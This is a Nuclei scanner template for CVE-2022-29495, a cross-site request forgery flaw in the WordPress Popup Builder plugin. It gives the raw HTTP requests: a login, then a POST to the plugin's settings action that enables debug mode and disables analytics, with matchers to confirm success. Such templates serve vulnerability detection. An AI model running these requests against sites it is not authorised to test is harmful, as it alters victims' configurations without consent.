id: CVE-2022-29495 info: name: WordPress Popup Builder <= 4.1.11 - Cross-Site Request Forgery author: Shivam Kamboj severity: medium description: | Sygnoos Popup Builder plugin <= 4.1.11 for WordPress contains a cross-site request forgery caused by lack of CSRF protection in plugin settings update, letting attackers change settings without authorization, exploit requires victim to visit malicious site or click malicious link. impact: | Attackers can modify plugin settings without authorization, potentially leading to site defacement or malicious content injection. remediation: | Implement CSRF tokens and verify requests properly, update to the latest plugin version. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-29495 - https://patchstack.com/database/vulnerability/popup-builder/wordpress-popup-builder-plugin-4-1-11-cross-site-request-forgery-csrf-leading-to-plugin-settings-update metadata: verified: true max-request: 2 publicwww-query: "plugins/popup-builder" tags: cve,cve2022,wordpress,wp-plugin,popup-builder,csrf,authenticated,wp flow: http(1) && http(2) http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 matchers: - type: dsl dsl: - 'status_code == 302' - 'contains(header, "wordpress_logged_in")' condition: and internal: true - raw: - | POST /wp-admin/admin-post.php?action=sgpbSaveSettings HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded sgpb-enable-debug-mode=on&sgpb-dont-delete-data=on&sgpb-disable-analytics-general=on matchers: - type: dsl dsl: - 'status_code == 302' - 'contains(header, "page=sgpbSettings") && contains(header, "post_type=popupbuilder")' condition: and extractors: - type: regex part: header regex: - "Location: (.+)" group: 1 # digest: 4b0a00483046022100a2416e5e88d19ff6761f558c2a2efc6e3fc13244e065d3fc8d9782aa5c6808ac022100d6bddfa1e68c1a7ce971f65743dacd96f891a3530f4c76b7e3e1e488b651980d:922c64590222798bb761d5b6d8e72950